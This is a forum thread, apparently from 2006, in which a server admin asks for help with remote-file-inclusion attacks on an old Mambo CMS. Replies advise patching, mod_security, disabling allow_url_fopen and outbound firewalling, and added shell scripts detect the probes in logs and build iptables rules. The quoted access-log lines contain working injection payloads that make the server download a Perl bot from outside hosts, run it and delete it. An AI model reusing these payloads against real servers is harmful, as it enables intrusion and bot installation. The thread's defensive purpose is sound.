Server being attacked by script injections

I have already chmodded wget, but the attacks still continue and seem to be getting more advanced. I need help securing the server.

Extract from logfile /var/log/apache2/access_log:

82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"

Extract from logfile /var/log/apache2/error_log:

[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
--22:20:55--  http://66.90.88.178/mambo.txt
           => `mambo.txt'
Connecting to 66.90.88.178:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,282 (16K) [text/plain]

    0K .......... .....                                      100%    7.77 KB/s

22:20:58 (7.77 KB/s) - `mambo.txt' saved [16282/16282]

kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or kill -l [sigspec]
[Sat Jul 15 22:41:53 2006] [warn] child process 13552 still did not exit, sending a SIGTERM
[Sat Jul 15 22:41:53 2006] [warn] child process 30607 still did not exit, sending a SIGTERM

Need help, advice, anything... Thank you in advance.
Remove the script ASAP. Contact the author of the script and tell them about this if you haven't written it yourself. You might also check for updates. Denying the IP won't solve it, because he can use a different server and voila, you get hacked again. I would lock down the server until it's checked out. Run chkrootkit and rkhunter (not sure if they detect this script, but it can't hurt running them). An antivirus scan can't hurt either. Btw, Mambo is a VERY buggy application. I would suggest you switch to Joomla if you want the same interface and stuff. I think you can even upgrade from Mambo to Joomla.
Can't find the scripts on my site

I can't seem to find the script on my server. I've installed rkhunter and updated + scanned the system; found nothing. 66.90.88.178 is not my site; it's just that my server is being told to get these scripts from various sites, including the one mentioned, and then running them. When I check my running processes I find a lot of https instances which don't make any sense to me. I've tried looking for help on installing mod_security on my SUSE 10 server, but had no luck. Not too sure if it's safe to install when running ISPConfig with SUSE 10 using the perfect setup from HowtoForge. I have also updated to the latest patches from SUSE. These scripts are also being run on domains that I have since made dormant, with nothing in the actual /var/www/web#/web folder; when I check my logs even they are being used to download these scripts, which is strange since before ISPConfig was installed I ran chmod 700 on wget.
The script looks like a war bot or whatever they are called. They are using a known exploit of the script (you are running the Mambo script, right?); they Google it and then try to inject this script. Check your running processes (ps) and network connections (netstat) for whether you are connected to IRC host 66.90.88.178, port 7474. If you are, kill it! And block that port and IP with the firewall. Once you fix this, go to that IRC channel and say to them: I just PWNED YOU!
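To make the log check above repeatable, here is an added example (not code from the thread or from Mambo) that pulls every request setting mosConfig_absolute_path to a remote URL out of an Apache access log and prints, per hit, the client IP, the host the script was told to include from, and the percent-decoded cmd chain the bot tried to run. The sample log is constructed from the lines quoted in the thread plus one harmless crawler hit; the file name and output format are assumptions.

```shell
#!/bin/sh
# Added example, not from the thread: report Mambo remote-file-inclusion
# attempts found in an Apache common-log-format access log.

# Constructed sample log: two lines modelled on the thread's entries plus one
# benign crawler request that must NOT be reported.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat >"$SAMPLE_LOG" <<'EOF'
82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"
61.135.145.206 - - [17/Jul/2006:21:24:12 +0200] "GET / HTTP/1.1" 200 17330 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
EOF

# rfi_hits LOGFILE
# Prints one line per request that points mosConfig_absolute_path at a remote
# URL: "<client-ip> <include-host> <decoded cmd parameter>".
rfi_hits() {
    awk '
    function hex2dec(h,    i, v) {
        v = 0
        for (i = 1; i <= length(h); i++)
            v = v * 16 + index("0123456789abcdef", tolower(substr(h, i, 1))) - 1
        return v
    }
    # Minimal percent-decoder so the command chain reads as the attacker wrote it.
    function urldecode(s,    out, c) {
        out = ""
        while (length(s) > 0) {
            c = substr(s, 1, 1)
            if (c == "%" && length(s) >= 3) {
                out = out sprintf("%c", hex2dec(substr(s, 2, 2)))
                s = substr(s, 4)
            } else if (c == "+") {
                out = out " "; s = substr(s, 2)
            } else {
                out = out c; s = substr(s, 2)
            }
        }
        return out
    }
    /mosConfig_absolute_path=(https?|ftp):\/\// {
        ip = $1
        # host part of the include URL (stops at the first / ? & " or space)
        match($0, "mosConfig_absolute_path=(https?|ftp)://[^/?&\" ]+")
        host = substr($0, RSTART, RLENGTH)
        sub(/^.*:\/\//, "", host)
        # the cmd= parameter carries the shell chain the included script runs
        cmd = ""
        if (match($0, "[?&]cmd=[^ &\"]*"))
            cmd = substr($0, RSTART + 5, RLENGTH - 5)
        print ip, host, urldecode(cmd)
    }' "$1" | sort -u
}

# rfi_sources LOGFILE: the probing client IPs only. As the thread notes these
# change all the time, so this is a record of who probed, not a fix.
rfi_sources() {
    rfi_hits "$1" | awk '{ print $1 }' | sort -u
}

rfi_hits "$SAMPLE_LOG"
```

The include host and the download host in the decoded cmd chain are the ones worth blocking outbound; the client IP only tells you who triggered the probe.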
Output of netstat:

Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags       Type       State         I-Node Path
unix  14     [ ]         DGRAM                    9984   /dev/log
unix  2      [ ]         DGRAM                    9986   /var/lib/named/dev/log
unix  2      [ ]         DGRAM                    4385   @/org/kernel/udev/udevd
unix  2      [ ]         DGRAM                    12216  @/var/run/hal/hotplug_socket2
unix  2      [ ]         DGRAM                    28905
unix  2      [ ]         DGRAM                    17548
unix  2      [ ]         DGRAM                    16934
unix  3      [ ]         STREAM     CONNECTED     16687
unix  3      [ ]         STREAM     CONNECTED     16686
unix  3      [ ]         STREAM     CONNECTED     16683
unix  3      [ ]         STREAM     CONNECTED     16682
unix  3      [ ]         STREAM     CONNECTED     16679
unix  3      [ ]         STREAM     CONNECTED     16678
unix  3      [ ]         STREAM     CONNECTED     16675
unix  3      [ ]         STREAM     CONNECTED     16674
unix  3      [ ]         STREAM     CONNECTED     16671
unix  3      [ ]         STREAM     CONNECTED     16670
unix  3      [ ]         STREAM     CONNECTED     16667
unix  3      [ ]         STREAM     CONNECTED     16666
unix  3      [ ]         STREAM     CONNECTED     16663
unix  3      [ ]         STREAM     CONNECTED     16662
unix  3      [ ]         STREAM     CONNECTED     16659
unix  3      [ ]         STREAM     CONNECTED     16658
unix  3      [ ]         STREAM     CONNECTED     16655
unix  3      [ ]         STREAM     CONNECTED     16654
unix  3      [ ]         STREAM     CONNECTED     16651
unix  3      [ ]         STREAM     CONNECTED     16650
unix  3      [ ]         STREAM     CONNECTED     16647
unix  3      [ ]         STREAM     CONNECTED     16646
unix  3      [ ]         STREAM     CONNECTED     16643
unix  3      [ ]         STREAM     CONNECTED     16642
unix  3      [ ]         STREAM     CONNECTED     16639
unix  3      [ ]         STREAM     CONNECTED     16638
unix  3      [ ]         STREAM     CONNECTED     16635
unix  3      [ ]         STREAM     CONNECTED     16634
unix  3      [ ]         STREAM     CONNECTED     16631
unix  3      [ ]         STREAM     CONNECTED     16630
unix  3      [ ]         STREAM     CONNECTED     16627
unix  3      [ ]         STREAM     CONNECTED     16626
unix  3      [ ]         STREAM     CONNECTED     16623
unix  3      [ ]         STREAM     CONNECTED     16622
unix  3      [ ]         STREAM     CONNECTED     16619
unix  3      [ ]         STREAM     CONNECTED     16618
unix  3      [ ]         STREAM     CONNECTED     16615
unix  3      [ ]         STREAM     CONNECTED     16614
unix  3      [ ]         STREAM     CONNECTED     16611
unix  3      [ ]         STREAM     CONNECTED     16610
unix  3      [ ]         STREAM     CONNECTED     16607
unix  3      [ ]         STREAM     CONNECTED     16606
unix  3      [ ]         STREAM     CONNECTED     16603
unix  3      [ ]         STREAM     CONNECTED     16602
unix  3      [ ]         STREAM     CONNECTED     16599
unix  3      [ ]         STREAM     CONNECTED     16598
unix  3      [ ]         STREAM     CONNECTED     16595
unix  3      [ ]         STREAM     CONNECTED     16594
unix  3      [ ]         STREAM     CONNECTED     16591
unix  3      [ ]         STREAM     CONNECTED     16590
unix  3      [ ]         STREAM     CONNECTED     16588
unix  3      [ ]         STREAM     CONNECTED     16587
unix  3      [ ]         STREAM     CONNECTED     16584
unix  3      [ ]         STREAM     CONNECTED     16583
unix  3      [ ]         STREAM     CONNECTED     16581
unix  3      [ ]         STREAM     CONNECTED     16580
unix  2      [ ]         DGRAM                    16565
unix  2      [ ]         DGRAM                    13315
unix  3      [ ]         STREAM     CONNECTED     13230  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     13229
unix  3      [ ]         STREAM     CONNECTED     13019  @/tmp/hald-local/dbus-qemgvsK3Jl
unix  3      [ ]         STREAM     CONNECTED     13018
unix  3      [ ]         STREAM     CONNECTED     12908  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     12907
unix  3      [ ]         STREAM     CONNECTED     12906  /var/run/acpid.socket
unix  3      [ ]         STREAM     CONNECTED     12905
unix  2      [ ]         DGRAM                    12902
unix  3      [ ]         STREAM     CONNECTED     12505  /var/run/acpid.socket
unix  3      [ ]         STREAM     CONNECTED     12504
unix  3      [ ]         STREAM     CONNECTED     12570  @/tmp/hald-local/dbus-qemgvsK3Jl
unix  3      [ ]         STREAM     CONNECTED     12503
unix  2      [ ]         DGRAM                    12142
unix  2      [ ]         DGRAM                    10931
unix  2      [ ]         DGRAM                    10743
unix  2      [ ]         DGRAM                    10537
unix  2      [ ]         DGRAM                    10363
unix  2      [ ]         DGRAM                    9994
unix  2      [ ]         STREAM     CONNECTED     9811
unix  3      [ ]         STREAM     CONNECTED     4968
unix  3      [ ]         STREAM     CONNECTED     4967
netstat -tap reveals the following:

Proto Recv-Q Send-Q Local Address           Foreign Address  State   PID/Program name
tcp   0      0      *:mysql                 *:*              LISTEN  3045/mysqld
tcp   0      0      localhost:compaq-evm    *:*              LISTEN  4683/fam
tcp   0      0      *:sunrpc                *:*              LISTEN  4306/portmap
tcp   0      0      *:hosts2-ns             *:*              LISTEN  4093/ispconfig_http
tcp   0      0      *:ftp                   *:*              LISTEN  5350/proftpd: (acce
tcp   0      0      192.168.0.200:domain    *:*              LISTEN  5276/named
tcp   0      0      server.mydomain:domain  *:*              LISTEN  5276/named
tcp   0      0      localhost:domain        *:*              LISTEN  5276/named
tcp   0      0      localhost:953           *:*              LISTEN  5276/named
tcp   0      0      *:smtp                  *:*              LISTEN  5138/master
tcp   0      0      *:pop3                  *:*              LISTEN  4531/couriertcpd
tcp   0      0      *:imap                  *:*              LISTEN  4501/couriertcpd
tcp   0      0      *:www-http              *:*              LISTEN  5005/httpd2-prefork
tcp   0      0      *:ssh                   *:*              LISTEN  4905/sshd
tcp   0      0      localhost:953           *:*              LISTEN  5276/named
tcp   0      0      *:smtp                  *:*              LISTEN  5138/master
tcp   0      0      *:https                 *:*              LISTEN  5005/httpd2-prefork
This is after I blocked what you said before on the firewall and restarted the server. I have also blocked the IPs in .htaccess.
For securing you could use mod_security for Apache. But be careful with that: a misconfigured mod_security causes e.g. phpMyAdmin to not work anymore, because it submits built queries via GET, which is disallowed in some howtos for mod_security. The next thing you can do is to disallow stuff like url_fopen wrappers in php.ini, because normally the admin should know if scripts need to get something from anywhere on the internet.
On what? Installation or configuration? That's an (undocumented) config example for mod_security. That can be placed anywhere in your Apache config... Under Debian it makes sense to store that file in mods-available and link it into mods-enabled on usage. Under SUSE I actually (and I don't mind) don't know the hundreds of files the config is split into and where best to put that... Also you must load the module with something like the following. To disable that stuff for e.g. phpMyAdmin: if you're not willing to apply the rules from above to _ALL_ your sites and to whitelist stuff like phpMyAdmin, it makes sense to apply that filter only on some dirs.... More on installation and configuration can be found here: http://www.modsecurity.org/documentation/modsecurity-apache/1.9.3/html-multipage/
Attacks continue

I've now spent the last 48h reinstalling the entire server. I've done all of the above mentioned, except for the mod_security bit, but when I check my logfiles I find the following. I've redone the websites; the Mambo sites are now blank Joomla (latest stable version) sites until I get time to redo them. The only .htaccess files I can find lie in the stats folders; is this correct?

/var/log/httpd/ispconfig_access_log:

www.mydomain.com||||167||||82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"

and in /var/log/apache2/access_log for the same time:

82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
61.135.145.206 - - [17/Jul/2006:21:24:12 +0200] "GET / HTTP/1.1" 200 17330 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"

and in /var/log/apache2/error_log at the same time:

[Mon Jul 17 21:23:03 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:23:03 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:24:12 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:24:12 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:21 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:21 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:31 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:31 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:32 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:32 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:43 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:43 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:44 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:44 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:46 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:46 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:47 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:47 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:48 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:48 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:49 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:49 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:52 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:52 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:53 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:53 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:58 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:58 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:02 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:02 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:06 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:06 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:07 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:07 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:12 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:12 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:15 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:15 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:34:46 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:34:46 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:35:06 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:35:06 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:43:37 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:43:37 2006] [error] an unknown filter was not added: PHP

Is this a failed attempt, or do I have reason to worry? I'm about to go out of my mind. Please help.
The attacks continue because you are still using the same buggy script! I've told you already to remove it from public usage! That PHP error is nothing you have to be worried about. But please, disable this Mambo site and the attacks will stop. Blocking 1 IP is kinda useless since they just change sites. Again, REMOVE THE WEBSITE, or update the website with a newer patch or something. What version of Mambo CMS are you using?
Just one thing to mention: it is good practice to enable and configure the firewall for outbound connections as well. If you had a good firewall script which allowed HTTP access only to trusted sites, then you wouldn't have to worry about those attacks.
see: http://www.howtoforge.com/forums/showthread.php?t=4770&highlight=$go_info["server"]["apache2_php"]
And don't forget to allow only some system users for some connections.... The next thing is to disable "allow_url_fopen" in php.ini to prevent any script from reading stuff from anywhere on the internet!
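The outbound-firewall idea from the last two posts (allow the web server's HTTP only to trusted hosts, and restrict it per system user) can be turned into a small rule generator. The following is an added example, not a script from the thread or from ISPConfig: it prints iptables commands that let one Unix user open TCP connections only to an allow-list of hosts on ports 80/443 and to the loopback interface (so PHP can still reach a local MySQL or SMTP), and log and reject every other connection that user tries to open. The user name wwwrun (the SUSE Apache user), the 192.0.2.x hosts and the chain name WEB_OUT are assumptions; it needs the owner, multiport, state and limit iptables match modules.

```shell
#!/bin/sh
# Added example, not from the thread: per-user outbound allow-list for the
# web server, generated as iptables commands so they can be reviewed first.

# outbound_rules USER [HOST...]
# Prints the rules instead of applying them. Apply (as root) with:
#   outbound_rules wwwrun 192.0.2.10 | sh
outbound_rules() {
    user=$1; shift
    [ -n "$user" ] || { echo "usage: outbound_rules USER [HOST...]" >&2; return 1; }
    echo "iptables -N WEB_OUT"
    echo "iptables -F WEB_OUT"
    # Local services (MySQL on 127.0.0.1, the local MTA) stay reachable.
    echo "iptables -A WEB_OUT -o lo -j ACCEPT"
    # Trusted remote hosts: only HTTP/HTTPS, nothing else.
    for h in "$@"; do
        echo "iptables -A WEB_OUT -d $h -p tcp -m multiport --dports 80,443 -j ACCEPT"
    done
    # Everything else the web user opens is logged (rate-limited) and refused
    # with a TCP reset, so a wget/lwp-download started from an injected
    # command fails at once instead of hanging an httpd child until timeout.
    echo "iptables -A WEB_OUT -m limit --limit 6/min -j LOG --log-prefix 'WEB_OUT_DENY: '"
    echo "iptables -A WEB_OUT -p tcp -j REJECT --reject-with tcp-reset"
    # Only NEW connections owned by the web user enter the chain; replies to
    # browsers are ESTABLISHED and never hit it, so serving pages is unaffected.
    echo "iptables -I OUTPUT -m owner --uid-owner $user -p tcp -m state --state NEW -j WEB_OUT"
}

# allowed_count USER [HOST...]: how many ACCEPT rules the set contains
# (loopback plus one per host), a cheap sanity check before applying.
allowed_count() {
    outbound_rules "$@" | grep -c -- '-j ACCEPT'
}

outbound_rules wwwrun 192.0.2.10 192.0.2.11
```

Pair this with allow_url_fopen = Off in php.ini, as the previous post recommends; the firewall then catches whatever a script still manages to spawn (wget, lwp-download, perl) rather than only PHP's own URL wrappers. Anything that legitimately needs outbound HTTP from the web user, such as an update check, has to be added to the allow-list explicitly.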